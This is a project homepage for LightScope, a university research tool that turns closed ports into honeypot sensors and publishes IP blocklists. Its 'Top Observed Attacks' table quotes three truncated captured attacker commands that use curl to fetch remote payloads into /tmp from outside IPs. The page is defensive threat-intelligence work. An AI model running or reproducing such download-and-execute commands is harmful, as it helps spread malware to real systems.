LightScope Logo

LightScope

Home Installation Contact FAQs Dashboard GitHub

Free, Open Source, Cybersecurity Research

What is LightScope?

LightScope is a free, open source cybersecurity research initiative that examines unwanted traffic from attackers and scanners. LightScope is different from existing solutions as it turns closed ports on live machines into network telescopes/honeypots, and transparently forwards attacker traffic to USC managed honeypots. This removes the risk of running honeypots on production systems, and makes LightScope difficult for attackers to detect and avoid (unlike traditional honeypots and network telescopes). All this leads to better data for researchers and network operators.

LightScope is only interested in unwanted traffic attackers/scanners are sending you. If you're running a webserver or some other application, LightScope will ignore traffic to and from it. We only look at what gets sent to your closed ports, where no legitmate services are running.

LightScope partners with AbuseIPDB, and assists them with verifying whether observed scans/attacks are spoofed. This is an important problem, as malicious actors spoof competitor's IPs in order to get them added to blocklists. Prior to LightScope, AbuseIPDB and other services were forced to be conservative and not add IPs they couldn't verify, even if they observed a signficant amount of unwanted traffic.

The LightScope client is free, open source, extremely lightweight, and designed to run on production machines. If you install it you will be provided with rich information about who's targeting your network and tailored IP blocklists you can use to keep your network safe. Please click on one of the images below and select a public enpoint to view the type of data you will recieve.

LightScope is based upon work supported by the U.S. National Science Foundation under Grant No. 2313998 and the University of Southern California Information Sciences Institute.

General Dashboard View

General Dashboard Overview

Individual Threat Actors View

Individual Threat Actors

Who's Targeting You?

Support NSF Cybersecurity Research at the University of Southern California, and the Open Source Community!

Install LightScope Now Explore Live Data Download Most Recent General Blocklist

See who's targeting your systems ā€¢ Get custom IP blocklists ā€¢ Help us make the internet safer.

IRB Certified Data Protection
LightScope has passed IRB approval verifying our anonymization, collection, and encrypted storage methods (certified exempt), as study UP-25-00124 ā€” LightScope - Survey of unwanted traffic to large user populations to the University of Southern California Institutional Review Board.

LightScope In Action

The table below illustrates how LightScope assists IP reputation services. As LightScope runs on production endpoints, it observes attacks that other services may miss. Notice how IPs who attack or attempt to log into LightScope endpoints are often misclassified as benign.

Attacker IP AbuseIPDB Score GreyNoise Status GreyNoise Class LightScope Blocklist Interactions
Loading attack data...
Table Generated: Loading...

How LightScope Compares

See how LightScope's unique approach provides advantages over other security tools and services.

VS

GreyNoise

LightScope runs on production hosts instead of dedicated honeypots, providing a different vantagepoint.

VS

AbuseIPDB & SpamHaus

LightScope blocks IPs faster. We report our findings to these services, but it may take more than our reports to get an IP blocked.

VS

Cisco Talos

LightScope is free, open source, and vendor-neutral - not limited to any one vendor's ecosystem.

VS

Fail2Ban

LightScope analyzes traffic at a lower level with more visibility, detecting things like port scans that Fail2Ban doesn't analyze.

VS

CrowdStrike Falcon

LightScope won't brick your system, as it doesn't need to run as root/admin. It's free, open source, and ultra-lightweight.

VS

SentinelOne Singularity

LightScope won't slow down your system as it doesn't scan running processes or system memory.

VS

EDR/XDR

LightScope is not EDR/XDR. LightScope gathers information about attackers and produces IP blocklists. Unlike EDR/XDR, it is extremely fast and won't bog down your system inspecting processes or memory. It is designed to work with your existing EDR/XDR solutions.

VS

Honeypots

LightScope runs on production systems, which attackers target. Attackers avoid dedicated honeypots, but to attackers LightScope systems appear real (because they are). LightScope is more secure than running your own honeypot, as it transparently forwards attackers to USC managed honeypots.

VS

Network Telescopes

Attackers avoid darkspace hosting network telescopes. LightScope works with your in use IP addresses and live machines. Feel free to use both and get complete network coverage!

Top Observed Attacks

Real attack commands captured by LightScope honeypots running on production systems

Attack Type Attacker IP Command Preview
Malware Download & Execute Campaign 196.251.71.119
nohup $SHELL -c "curl http://47.236.20.49:60120/linux -o /tmp/haBCRfTf6Z...
Encrypted Payload Deployment 159.89.105.244
nohup $SHELL -c "curl http://8.220.245.115:60117/linux -o /tmp/Xqmvb45Dzl...
Multi-Stage Botnet Infection 204.48.23.8
nohup $SHELL -c "curl http://47.239.192.107:60140/linux -o /tmp/QNl0GdStgG...
Click any attack to view full details and analysis

IP Intelligence Report

Attacker Intelligence Report -- IP metadata provided by ipinfo.io powered by IPinfo.io
LightScope Honeypot Interactions
Observed Attacker Scan Activity Across All LightScope Endpoints
Loading port activity data...

Attack Analysis Report

Attack Type
Source IP Address
Attack Command Details
Threat Analysis

Acknowledgments

IPinfo.io

Providing comprehensive IP geolocation and intelligence data. Supporting academic research.

AbuseIPDB

Partnership and support with comprehensive IP reputation database for cybersecurity research.

GreyNoise.io

Providing comprehensive threat intelligence data for academic research and analysis.
NSF Logo

This material is based upon work supported by the U.S. National Science Foundation under Grant No. 2313998. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the U.S. National Science Foundation.

University of Southern California

ISI Logo Viterbi Logo USC Logo

Information Sciences Institute & Viterbi School of Engineering